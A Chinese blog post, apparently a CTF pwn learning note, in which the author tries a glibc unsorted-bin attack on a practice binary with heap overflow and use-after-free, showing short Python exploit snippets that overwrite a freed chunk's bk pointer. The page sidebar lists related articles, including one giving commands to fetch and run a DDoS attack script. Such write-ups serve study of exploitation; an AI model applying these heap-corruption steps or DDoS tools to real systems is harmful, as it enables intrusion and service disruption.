尝试一下unsorebin-attack

最新推荐文章于 2024-06-14 09:50:01 发布
最新推荐文章于 2024-06-14 09:50:01 发布
阅读量359 收藏 9
点赞数 6
分类专栏: pwn 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fuiifiuiii/article/details/136722956
版权

探探unsortedbin-attack

前言:看着都说这个只能改大小没啥用,但是处于务实精神,还是要自己手动试一试的,找了一个存在堆溢出+uaf的来改着试试看看。正好再偷个小懒

  • 原理是wiki写的这个,都说很简单,但我还是感觉迷迷糊糊的,到底哪儿跟哪儿啊。。(据说bck是下一个块,也就是我这里的3号块)
    在这里插入图片描述
    先创了几个块,这里注意要将准备free为unsortedbin的块分开,否则会被合并掉,问就是试过(
creat(0x60,b'AAAAAA')#0
creat(0x80,b'AAAAAA')#1
creat(0x60,b'AAAAA')#2
creat(0x90,b'AAAAA')#3
creat(0x60,b'A')#4
free(1)
free(3)
debug()

在这里插入图片描述
看了看,实际上这样就行,而且必须要全部用掉,否则如果切出来smallbin的块后会报错导致程序中断。(具体因为什么检测还不太清楚)

creat(0x60,b'AAAAAA')#0
creat(0x80,b'AAAAAA')#1
creat(0x60,b'AAAAA')#2
creat(0x90,b'AAAAA')#3
creat(0x60,b'A')#4
free(1)
#free(3)
#debug()
edit(1,p64(0)+p64(0x602500))
#debug()
creat(0x80,b'BB')#5

在这里插入图片描述
另外:明明fd、bk都被我改掉了,那怎么找到的对应的块。
猜测:通过arena索引到的块进行的分配
原因:bck(伪造的bk地址)->fd的位置被分配了main_arena+88的地址。
在这里插入图片描述

XYYR-c
关注
  • 6
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Distributed-dictionary-attack
05-09
Distributed-dictionary-attack是一个Java程序,它使用增量禁止系统实现易受攻击的服务器。 在该项目中,有一些通过RabbitMQ中间件进行通信的客户端。 客户端之间交换的消息是错误的密码。 你需要什么 - - -
one-pixel-attack-pytorch
03-26
one-pixel-attack-pytorch
活体检测——Replay-Attack数据集
小花生的博客
05-15 2835
Replay-Attack人脸防作伪数据集 参考论文:《On the Effectiveness of Local Binary Patterns in Face Anti-spoofing》 下载链接: https://www.idiap.ch/en/dataset/replayattack 数据集描述:   Replay-Attack数据库由1300个视频组成,这些视频在不同的光照条件下对50个实验人员进行真假人脸的样本采集。数据库由瑞士的IDIAP研究所建立。   总共有1300个视频,分成了四个
压力测试工具之DDos-Attack
石宗昊的博客
04-03 2279
git clone https://github.com/Ha3MrX/DDos-Attack cd DDos-Attack chmod +x ddos-attack.py python ddos-attack.py
【数据集介绍】The Idiap Research Institute REPLAY-ATTACK Database
小C的博客
09-12 4925
【编辑时间】2018.09.12 【数据集介绍】The Idiap Research Institute REPLAY-ATTACK Database   一、数据集整体描述   Spoofing Attacks Description ---------------------------- The 2D face spoofing attack database consists...
DDos-Attack攻击器教程(kali linux)
热门推荐
小陈的日常生活
06-22 1万+
这个攻击器全部是由python编写的 1.配置环境 首先你需要一台电脑(废话!没电脑我还学个P)好了,开玩笑的嘻嘻 你需要一个kali linunx 当然VM也可以 2.复制我的DDos-Attack工具 (1)打开Kali linunx终端 (2)输入:git clone https://github.com/xhs753/DDos-Attack (3)等待几秒 (4)输入:cd DDoS-Attack-Guy进入到这个目录中 (5)输入:chmod +x attack-guy.py命令赋予其权限 (6)
shellshock-Attack-Lab
qq_49005782的博客
11-07 4006
shellshock Attack Lab 实验概述 实验背景 2014 年 9 月 24 日,发现了 Bash 中的一个严重漏洞 Shellshock,这个漏洞可以用于许多系统,可以远程启动,也可以从本地机器启动。在这个实验中,学生们需要研究这种攻击,这样才能了解Shellshock 的脆弱性. 此次实验包括以下四个内容: Shellshock Environment variables Function definition in bash Apache and CGI programs 实验
RSA进阶之维纳攻击(wiener-attack )
weixin_30716141的博客
11-06 8400
维纳攻击: 场景:e很大 例题: 第七届山东网络安全技能大赛 链接:https://pan.baidu.com/s/1IRInw3pB7SQfp3MxRJW17A 提取码:lcn3 e很大,妥了,维纳攻击。 脚本在github上。 https://github.com/pablocelayes/rsa-wiener-attack 这个脚本用起来很简单,不过一开始我还是花了点时间。...
burp-intrude-Attack-type的使用介绍
煜铭2011
10-06 1万+
0x01 Attack type简介       Burpintruder是一个强大的工具,用于自动对Web应用程序自定义的攻击。它可以用来自动执行所有类型的任务您的测试过程中可能出现的。它支持各种攻击类型 - 这些决定在何种负载分配给有效载荷仓的方式。攻击类型可以使用请求模板编辑器上方的下拉菜单进行选择。此外它能够定义多个位置,多种攻击载荷来进行灵活的攻击。 0x02 Attack
数据分析数字取证-attack 中职网络安全
zx66661的博客
03-08 3953
数据分析数字取证-attack 任务环境说明: 渗透机场景:Windows 7 渗透机场景用户名:administrator,密码:123456 1.从靶机服务器的FTP上下载attack.pcapng数据包文件,通过分析数据包attack.pcapng,找出黑客的IP地址,并将黑客的IP地址作为FLAG(形式:[IP地址])提交; flag:[192.168.10.106] 2.继续查看数据包文件attack.pacapng,分析出黑客扫描得到的靶机开放的端口,将靶机开放的端口作为FLAG.
Multi-Attack Web Method
天元喜羊羊的博客
06-29 2258
操作如下: root@bt:~# cd /pentest/exploits/set/ root@bt:/pentest/exploits/set# ./set 01011001011011110111010100100000011100 10011001010110000101101100011011000111 10
Multi-attack Reference Hashing Generation for Image Authentication
02-08
Abstract.... In this paper, we present a Multi-Attack Reference Hashing (MRH) method based on hashing cluster for image authentication, which is expected to use prior information, i.e. the s
浅析node应用的timing-attack安全漏洞
08-27
本篇文章给大家通过原理的原因分析了node应用的timing-attack安全漏洞问题,有兴趣的朋友阅读参考下。
auditd-attack:映射到MITRE的Attack FrameworkLinux Auditd规则集
02-04
auditd-attack:映射到MITRE的Attack FrameworkLinux Auditd规则集
每日一题——Python实现PAT乙级1042 字符统计(举一反三+思想解读+逐步优化)
weixin_44915521的博客
06-09 1055
这些编程思想和哲学理念在编写高效、健壮的代码时至关重要。通过理解和应用这些原则,我们不仅能够写出性能更好的代码,还能在不同情况下做出更加明智的设计决策。通过理解和应用这些哲学和编程思想,可以在不同场景中灵活运用,写出更加高效、健壮和灵活的代码。评估需求:根据实际需求选择最合适的数据结构和算法。避免冗余:尽量避免不必要的重复计算和操作。权衡利弊:在空间和时间之间找到最佳平衡点。灵活应变:根据输入数据的特性,灵活使用动态数据结构和提前决策策略。
基于JavaScript 如何实现爬山算法以及优化方案
乐闻世界
06-10 1269
爬山算法(Hill Climbing Algorithm)是一种常见的启发式搜索算法,常用于解决优化问题。其核心思想是从一个初始状态出发,通过逐步选择使目标函数值增大的邻近状态来寻找最优解。接下来,我们将通过 JavaScript 实现一个简单的爬山算法,帮助大家理解其原理和应用。从一个初始状态开始。评估当前状态的目标函数值。在当前状态的邻居中选择一个目标函数值更大的状态。如果找到了更优的邻居,则移动到该邻居并重复步骤2和步骤3。如果没有更优的邻居,则算法结束,当前状态即为局部最优解。
2024.6.13刷题记录
最新发布
lshx4658的博客
06-14 311
当时没有想到怎么保证队内全都是窗口内的元素,答案:“当队头元素在窗口的左边的时候,弹出队头”,虽然不能保证队内一直没有窗口外的元素,但是能保证使用到的队内元素(队头)全是窗口内元素。当时是有想到这个方法的,但是以为不行,一下没转过来弯。队列储存索引而不是元素,通过储存索引使我们能够快速判断元素是否出窗口。不会,思路来自题解(
Java——简单图书管理系统
m0_74100417的博客
06-09 1381
数据类型变量iffor数组方法类和对象封装继承多态抽象类和接口今天就是把上述知识点全部都用起来 图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理系统图书管理
replay-attack数据集
09-01
replay-attack数据集是一个广泛使用的用于生物特征识别领域的数据集。该数据集主要用于评估生物特征识别系统对于"replay attacks"(重放攻击)的鲁棒性。 重放攻击是一种常见的生物特征识别系统攻击方法之一,攻击者通过以前录制的生物特征的视频、语音或图像等方式来试图欺骗识别系统。这种攻击模式有着较低的技术门槛,因此需要通过评估和改进生物特征识别系统的鲁棒性来应对这种攻击。 replay-attack数据集包含了多个攻击者模拟重放攻击的视频数据,并结合真实用户的视频数据来构建。数据集中的攻击手段包括使用手机、平板电脑等设备重放以前录制的真实用户视频或图像,以此来欺骗生物特征识别系统。这些视频数据在采集技术、手段和攻击条件等方面都有所不同,以便更全面地评估生物特征识别系统的鲁棒性。 通过使用replay-attack数据集,研究人员能够评估不同的算法和方法对于重放攻击的识别能力,并设计更鲁棒的生物特征识别系统。此数据集可用于训练和测试生物特征识别系统,以提高其对重放攻击的抵抗能力。 总之,replay-attack数据集是一个用于评估生物特征识别系统对重放攻击的鲁棒性的数据集,通过使用该数据集可以提高生物特征识别系统的抵抗能力,并为研究人员提供了一个评估和改进生物特征识别系统的平台。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值